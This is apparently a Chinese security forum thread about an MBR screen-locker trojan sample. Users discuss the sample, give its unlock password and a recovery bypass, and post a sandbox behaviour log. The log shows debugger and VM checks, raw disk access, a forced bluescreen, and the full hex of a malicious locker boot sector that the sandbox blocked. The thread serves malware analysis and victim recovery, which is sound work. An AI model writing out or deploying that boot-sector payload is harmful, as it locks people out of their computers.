一个锁机，谁跑下行为分析

显示全部楼层 · 发表于 2019-2-19 18:40:41

SUARP-BIGNUM 发表于 2019-2-19 18:17
大佬，这篇文章看看呀https://bbs.pediy.com/thread-249319-1.htm#1580121

分析写的不错，不过这个木马没什么特色，能在什么杀软下生存吗？

显示全部楼层 · 发表于 2019-2-19 20:22:52

wowocock 发表于 2019-2-19 18:40
分析写的不错，不过这个木马没什么特色，能在什么杀软下生存吗？

潜伏比较强，但是不是针对国内的

显示全部楼层 · 发表于 2019-2-20 21:46:58

本帖最后由 yjwfdc 于 2019-2-20 21:49 编辑

运行了一下，应该和以前的一样，写mbr后蓝屏。可以在pe下运行电脑速度卫士看到密码，也可以跳过密码，重启后在输入密码的地方，按回车就可以了。

密0:婿vZ蜁T鋞堻6@罭r 或Alt+208放246放118放90放205放149放84放228放116放136放252放54放64放193放78放6放114放

显示全部楼层 · 发表于 2019-2-21 23:56:01

虚拟机蓝屏，是不是有什么检测手段？

显示全部楼层 · 发表于 2019-2-22 07:02:07

蜘蛛殺

显示全部楼层 · 发表于 2019-2-22 12:59:06

不知道这个算不算

12:57:15[1]：(允许)程序启动：File_Analysis 行为记录成功开启规则版本：2.9.0.0

12:57:15[2]：(允许)载入动态链接库：USER32.dll

12:57:15[3]：(允许)字符串3：USER32.dll

12:57:15[4]：(允许)载入动态链接库：ADVAPI32.dll

12:57:15[5]：(允许)字符串3：ADVAPI32.dll

12:57:15[6]：(允许)载入动态链接库：NTDLL.dll

12:57:15[7]：(允许)字符串3：NTDLL.dll

12:57:15[8]：(允许)打开内核对象：\\.\SICE(物理设备)

12:57:15[9]：(允许)字符串3：\\.\SICE

12:57:15[10]：(允许)内联文件路径：\\.\SICE

12:57:15[11]：(允许)打开内核对象：\\.\SIWVID(物理设备)

12:57:15[12]：(允许)字符串3：\\.\SIWVID

12:57:15[13]：(允许)内联文件路径：\\.\SIWVID

12:57:15[14]：(允许)打开内核对象：\\.\NTICE(物理设备)

12:57:15[15]：(允许)字符串3：\\.\NTICE

12:57:15[16]：(允许)内联文件路径：\\.\NTICE

12:57:15[17]：(允许)映射动态链接库：ntdll.dll

12:57:15[18]：(允许)加载库文件：ntdll.dll    函数名：NtOpenKey

12:57:15[19]：(允许)加载库文件：ntdll.dll    函数名：GetNativeSystemInfo

12:57:15[20]：(允许)载入动态链接库：winmm.dll

12:57:15[21]：(允许)字符串3：winmm.dll

12:57:15[22]：(允许)加载库文件：winmm.dll    函数名：timeGetTime

12:57:15[23]：(允许)载入动态链接库：NTDLL

12:57:16[24]：(允许)字符串3：NTDLL

12:57:16[25]：(允许)加载库文件：NTDLL    函数名：NtOpenThread

12:57:16[26]：(允许)载入动态链接库：winmm.dll

12:57:16[27]：(允许)字符串3：winmm.dll

12:57:16[28]：(允许)加载库文件：winmm.dll    函数名：timeGetTime

12:57:16[29]：(允许)读取注册表键值：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc    数据：

12:57:16[30]：(允许)读取注册表键值：HKEY_LOCAL_MACHINE\Hardware\description\System\SystemBiosVersion    数据：VMware SVGA 3D

12:57:16[31]：(允许)读取注册表键值：HKEY_LOCAL_MACHINE\Hardware\description\System\VideoBiosVersion    数据：INTEL  - 6040000

12:57:16[32]：(允许)读取文件：C:\Windows\system32\ntdll.dll

12:57:16[33]：(允许)字符串3：C:\Windows\system32\ntdll.dll

12:57:16[34]：(允许)内联文件路径：C:\Windows\system32\ntdll.dll

12:57:16[35]：(允许)映射动态链接库：ntdll.dll

12:57:16[36]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[37]：(允许)字符串3：kernel32.dll

12:57:16[38]：(允许)字符串3：C:\Windows\Globalization\Sorting\sortdefault.nls

12:57:16[39]：(允许)内联文件路径：C:\Windows\Globalization\Sorting\sortdefault.nls

12:57:16[40]：(允许)映射动态链接库：ntdll.dll

12:57:16[41]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[42]：(允许)映射动态链接库：ntdll.dll

12:57:16[43]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[44]：(允许)映射动态链接库：ntdll.dll

12:57:16[45]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[46]：(允许)映射动态链接库：ntdll.dll

12:57:16[47]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[48]：(允许)映射动态链接库：ntdll.dll

12:57:16[49]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[50]：(允许)映射动态链接库：ntdll.dll

12:57:16[51]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[52]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:16[53]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:16[54]：(允许)查找窗口：pediy06(窗口类名)

12:57:16[55]：(允许)获取进程快照：系统全部进程

12:57:16[56]：(允许)查找窗口：FilemonClass(窗口类名)

12:57:16[57]：(允许)查找窗口：(窗口类名)

12:57:16[58]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

12:57:16[59]：(允许)查找窗口：(窗口类名)

12:57:16[60]：(允许)映射动态链接库：ntdll.dll

12:57:16[61]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[62]：(允许)映射动态链接库：ntdll.dll

12:57:16[63]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[64]：(允许)查找窗口：RegmonClass(窗口类名)

12:57:16[65]：(允许)查找窗口：(窗口类名)

12:57:16[66]：(允许)查找窗口：18467-41(窗口类名)

12:57:16[67]：(允许)映射动态链接库：ntdll.dll

12:57:16[68]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[69]：(允许)映射动态链接库：ntdll.dll

12:57:16[70]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[71]：(允许)映射动态链接库：ntdll.dll

12:57:16[72]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[73]：(允许)映射动态链接库：ntdll.dll

12:57:16[74]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[75]：(允许)映射动态链接库：ntdll.dll

12:57:16[76]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[77]：(允许)加载库文件：ntdll.dll    函数名：RtlAllocateHeap

12:57:16[78]：(允许)载入动态链接库：KERNEL32.dll

12:57:16[79]：(允许)字符串3：KERNEL32.dll

12:57:16[80]：(允许)载入动态链接库：USER32.dll

12:57:16[81]：(允许)字符串3：USER32.dll

12:57:16[82]：(允许)载入动态链接库：GDI32.dll

12:57:16[83]：(允许)字符串3：GDI32.dll

12:57:16[84]：(允许)载入动态链接库：WINMM.dll

12:57:16[85]：(允许)字符串3：WINMM.dll

12:57:16[86]：(允许)载入动态链接库：WINSPOOL.DRV

12:57:16[87]：(允许)字符串3：WINSPOOL.DRV

12:57:16[88]：(允许)载入动态链接库：ADVAPI32.dll

12:57:16[89]：(允许)字符串3：ADVAPI32.dll

12:57:16[90]：(允许)载入动态链接库：SHELL32.dll

12:57:16[91]：(允许)字符串3：SHELL32.dll

12:57:16[92]：(允许)载入动态链接库：ole32.dll

12:57:16[93]：(允许)字符串3：ole32.dll

12:57:16[94]：(允许)载入动态链接库：OLEAUT32.dll

12:57:16[95]：(允许)字符串3：OLEAUT32.dll

12:57:16[96]：(允许)字符串3：C:\Windows\SYSTEM32\OLEAUT32.dll

12:57:16[97]：(允许)字符串3：ole32.dll

12:57:16[98]：(允许)载入动态链接库：COMCTL32.dll

12:57:16[99]：(允许)字符串3：COMCTL32.dll

12:57:16[100]：(允许)载入动态链接库：WS2_32.dll

12:57:16[101]：(允许)字符串3：WS2_32.dll

12:57:16[102]：(允许)载入动态链接库：comdlg32.dll

12:57:16[103]：(允许)字符串3：comdlg32.dll

12:57:16[104]：(允许)字符串3：C:\Windows\SYSTEM32\comdlg32.dll

12:57:16[105]：(允许)查找窗口：FilemonClass(窗口类名)

12:57:16[106]：(允许)查找窗口：(窗口类名)

12:57:16[107]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

12:57:16[108]：(允许)查找窗口：(窗口类名)

12:57:16[109]：(允许)映射动态链接库：ntdll.dll

12:57:16[110]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[111]：(允许)映射动态链接库：ntdll.dll

12:57:16[112]：(允许)加载库文件：ntdll.dll    函数名：NtQuerySystemInformation

12:57:16[113]：(允许)映射动态链接库：NTDLL

12:57:16[120]：(允许)映射动态链接库：api-ms-win-core-com-l1-1-0

12:57:16[121]：(允许)字符串3：combase.dll

12:57:16[122]：(允许)加载库文件：api-ms-win-core-com-l1-1-0    函数名：RtlAllocateHeap

12:57:16[123]：(允许)映射动态链接库：KERNEL32

12:57:16[124]：(允许)加载库文件：KERNEL32    函数名：IsProcessorFeaturePresent

12:57:16[125]：(允许)字符串3：C:\Windows\system32\uxtheme.dll

12:57:16[127]：(允许)映射动态链接库：

12:57:16[128]：(允许)字符串1：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\

12:57:16[129]：(允许)字符串1：神话1.5.vmp.exe

12:57:16[130]：(允许)字符串2：Window

12:57:16[131]：(允许)字符串3：dwmapi.dll

12:57:16[132]：(允许)字符串3：C:\Windows\system32\dwmapi.dll

12:57:16[133]：(允许)字符串2：Window

12:57:16[134]：(允许)映射动态链接库：

12:57:16[135]：(允许)字符串3：神话1.5.vmp.exe

12:57:16[136]：(允许)字符串1：\

12:57:16[137]：(允许)字符串1：kernel32.dll

12:57:16[138]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[139]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[140]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[141]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[142]：(允许)载入动态链接库：kernel32.dll

12:57:16[143]：(允许)加载库文件：kernel32.dll    函数名：LocalAlloc

12:57:16[144]：(允许)字符串1：\

12:57:16[145]：(允许)字符串1：kernel32.dll

12:57:16[146]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[147]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[148]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[149]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32.dll

12:57:16[150]：(允许)载入动态链接库：kernel32.dll

12:57:16[151]：(允许)加载库文件：kernel32.dll    函数名：LocalFree

12:57:16[152]：(允许)字符串1：\

12:57:16[153]：(允许)字符串1：kernel32

12:57:16[154]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[155]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[156]：(允许)字符串3：kernel32.DLL

12:57:16[157]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[158]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[159]：(允许)字符串3：kernel32.DLL

12:57:16[160]：(允许)载入动态链接库：kernel32

12:57:16[161]：(允许)加载库文件：kernel32    函数名：CreateFileA

12:57:16[162]：(允许)读取文件：\\.\\physicaldrive0

12:57:16[163]：(允许)字符串3：\\.\\physicaldrive0

12:57:16[164]：(允许)内联文件路径：\\.\\physicaldrive0

12:57:16[165]：(允许)载入动态链接库：Kernel32.dll

12:57:16[166]：(允许)字符串3：Kernel32.dll

12:57:16[167]：(允许)加载库文件：Kernel32.dll    函数名：SetFilePointer

12:57:16[168]：(允许)字符串1：\

12:57:16[169]：(允许)字符串1：kernel32

12:57:16[170]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[171]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:16[172]：(允许)字符串3：kernel32.DLL

12:57:16[173]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[174]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[175]：(允许)字符串3：kernel32.DLL

12:57:17[176]：(允许)载入动态链接库：kernel32

12:57:17[177]：(允许)加载库文件：kernel32    函数名：ReadFile

12:57:17[178]：(允许)字符串1：\

12:57:17[179]：(允许)字符串1：kernel32

12:57:17[180]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[181]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[182]：(允许)字符串3：kernel32.DLL

12:57:17[183]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[184]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[185]：(允许)字符串3：kernel32.DLL

12:57:17[186]：(允许)载入动态链接库：kernel32

12:57:17[187]：(允许)加载库文件：kernel32    函数名：CloseHandle

12:57:17[188]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

12:57:17[189]：(允许)字符串1：\

12:57:17[190]：(允许)字符串1：kernel32

12:57:17[191]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[192]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[193]：(允许)字符串3：kernel32.DLL

12:57:17[194]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[195]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\kernel32

12:57:17[196]：(允许)字符串3：kernel32.DLL

12:57:17[197]：(允许)载入动态链接库：kernel32

12:57:17[198]：(允许)加载库文件：kernel32    函数名：WriteFile

12:57:17[199]：(阻止)写入MBR Hex： 33 C0 8E D0 BC 00 7C 8E C0 8E D8 BE 00 7C BF 00 06 B9 00 02 FC F3 A4 50 68 1C 06 CB FB B9 04 00 BD BE 07 80 7E 00 00 7C 0B 0F 85 0E 01 83 C5 10 E2 F1 CD 18 88 56 00 55 C6 46 11 05 C6 46 10 00 B4 41 BB AA 55 CD 13 5D 72 0F 81 FB 55 AA 75 09 F7 C1 01 00 74 03 FE 46 10 66 60 80 7E 10 00 74 26 66 68 00 00 00 00 66 FF 76 08 68 00 00 68 00 7C 68 01 00 68 10 00 B4 42 8A 56 00 8B F4 CD 13 9F 83 C4 10 9E EB 14 B8 01 02 BB 00 7C 8A 56 00 8A 76 01 8A 4E 02 8A 6E 03 CD 13 66 61 73 1C FE 4E 11 75 0C 80 7E 00 80 0F 84 8A 00 B2 80 EB 84 55 32 E4 8A 56 00 CD 13 5D EB 9E 81 3E FE 7D 55 AA 75 6E FF 76 00 E8 8D 00 75 17 FA B0 D1 E6 64 E8 83 00 B0 DF E6 60 E8 7C 00 B0 FF E6 64 E8 75 00 FB B8 00 BB CD 1A 66 23 C0 75 3B 66 81 FB 54 43 50 41 75 32 81 F9 02 01 72 2C 66 68 07 BB 00 00 66 68 00 02 00 00 66 68 08 00 00 00 66 53 66 53 66 55 66 68 00 00 00 00 66 68 00 7C 00 00 66 61 68 00 00 07 CD 1A 5A 32 F6 EA 00 7C 00 00 CD 18 A0 B7 07 EB 08 A0 B6 07 EB 03 A0 B5 07 32 E4 05 00 07 8B F0 AC 3C 00 74 09 BB 07 00 B4 0E CD 10 EB F2 F4 EB FD 2B C9 E4 64 EB 00 24 02 E0 F8 24 02 C3 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 63 7B 9A 00 00 00 00 00 00 00 00 02 00 EE FF FF FF 01 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA

12:57:17[200]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

12:57:17[201]：(阻止)写入MBR Hex： E9 00 00 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD ED 7C BB ED 7C E8 B0 00 89 C1 B8 01 13 BB 0C 00 B2 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31 C0 CD 16 3C 08 74 13 3C 0D 74 1B B4 02 88 07 88 67 01 81 C3 02 00 41 E9 E5 FF 81 EB 02 00 49 31 C0 89 07 E9 D9 FF 8C C8 8E C0 31 DB BE DA 7C 2E 8A 0E D9 7C B5 00 3E 8A 07 26 8A 24 38 E0 75 31 81 C3 02 00 46 E2 EF 31 C0 B8 00 7E 8E C0 31 DB B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 31 DB B2 80 B4 03 B0 01 B6 00 B5 00 B1 01 CD 13 E9 1D 00 BB 00 B8 81 C3 38 00 B0 58 88 07 2E 8B 0E D9 7C 31 C0 89 07 81 C3 02 00 E2 F8 E9 45 FF B8 FF FF 50 B8 00 00 50 CB 51 53 3E 8A 0F 80 F9 00 74 05 43 40 E9 F3 FF 59 5B C3 11 D0 F6 76 5A CD 95 54 E4 74 88 FC 36 40 C1 4E 06 72 00 00 6A 69 65 73 75 6F 2D 51 51 2D 31 30 30 33 36 33 32 32 34 32 00 21 21 21 50 6C 65 61 73 65 20 65 6E 74 65 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA

精准分析MBR逻辑锁密码：婿vZ蜁T鋞堻6@罭r    Hex：D0 F6 76 5A CD 95 54 E4 74 88 FC 36 40 C1 4E 06 72 00 00 6A 69 65 73 75 6F 2D 51 51 2D 31 30 30 33 36 33 32 32 34 32 00 21 21 21 50 6C 65 61 73 65 20 65 6E 74 65 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64

12:57:17[202]：(允许)字符串1：\

12:57:17[203]：(允许)字符串1：ntdll.dll

12:57:17[204]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[205]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[206]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[207]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[208]：(允许)载入动态链接库：ntdll.dll

12:57:17[209]：(允许)加载库文件：ntdll.dll    函数名：RtlAdjustPrivilege

12:57:17[210]：(阻止)内核操作：提升进程关机权限

12:57:17[211]：(允许)字符串1：\

12:57:17[212]：(允许)字符串1：ntdll.dll

12:57:17[213]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[214]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[215]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[216]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[217]：(允许)载入动态链接库：ntdll.dll

12:57:17[218]：(允许)加载库文件：ntdll.dll    函数名：RtlInitUnicodeString

12:57:17[219]：(允许)载入动态链接库：Kernel32.dll

12:57:17[220]：(允许)字符串3：Kernel32.dll

12:57:17[221]：(允许)加载库文件：Kernel32.dll    函数名：lstrcpyn

12:57:17[222]：(允许)字符串1：\

12:57:17[223]：(允许)字符串1：ntdll.dll

12:57:17[224]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[225]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[226]：(允许)载入动态链接库：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[227]：(允许)字符串3：C:\Users\Administrator\Desktop\File_Analysis 2.7测病毒[密码：520]\File_safe\ntdll.dll

12:57:17[228]：(允许)载入动态链接库：ntdll.dll

12:57:17[229]：(允许)加载库文件：ntdll.dll    函数名：NtRaiseHardError

12:57:17[230]：(阻止)内核操作：触发系统蓝屏

12:57:18[231]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:18[232]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:18[233]：(允许)查找窗口：pediy06(窗口类名)

12:57:20[234]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:20[235]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:20[236]：(允许)查找窗口：pediy06(窗口类名)

12:57:20[237]：(允许)查找窗口：Regmonclass(窗口类名)

12:57:20[238]：(允许)查找窗口：18467-41(窗口类名)

12:57:21[239]：(允许)查找窗口：Filemonclass(窗口类名)

12:57:21[240]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

12:57:22[241]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:22[242]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:22[243]：(允许)查找窗口：pediy06(窗口类名)

12:57:24[244]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:24[245]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:24[246]：(允许)查找窗口：pediy06(窗口类名)

12:57:25[247]：(允许)查找窗口：Regmonclass(窗口类名)

12:57:25[248]：(允许)查找窗口：18467-41(窗口类名)

12:57:25[249]：(允许)查找窗口：Filemonclass(窗口类名)

12:57:25[250]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

12:57:26[251]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:26[252]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:26[253]：(允许)查找窗口：pediy06(窗口类名)

12:57:28[254]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:28[255]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:28[256]：(允许)查找窗口：pediy06(窗口类名)

12:57:29[257]：(允许)查找窗口：Regmonclass(窗口类名)

12:57:30[258]：(允许)查找窗口：18467-41(窗口类名)

12:57:30[259]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:30[260]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:30[261]：(允许)查找窗口：pediy06(窗口类名)

12:57:30[262]：(允许)查找窗口：Filemonclass(窗口类名)

12:57:30[263]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

12:57:32[264]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:32[265]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:32[266]：(允许)查找窗口：pediy06(窗口类名)

12:57:34[267]：(允许)查找窗口：OLLYDBG(窗口类名)

12:57:34[268]：(允许)查找窗口：GBDYLLO(窗口类名)

12:57:34[269]：(允许)查找窗口：pediy06(窗口类名)

12:57:34[270]：(允许)查找窗口：Regmonclass(窗口类名)

12:57:34[271]：(允许)查找窗口：18467-41(窗口类名)

12:57:35[272]：(允许)查找窗口：Filemonclass(窗口类名)

12:57:35[273]：(允许)查找窗口：PROCMON_WINDOW_CLASS(窗口类名)

显示全部楼层 · 发表于 2019-2-22 21:59:37

kav kill

显示全部楼层 · 发表于 2019-2-22 22:05:59

kav kill

[病毒样本] 一个锁机，谁跑下行为分析

本帖子中包含更多资源

评分

本帖子中包含更多资源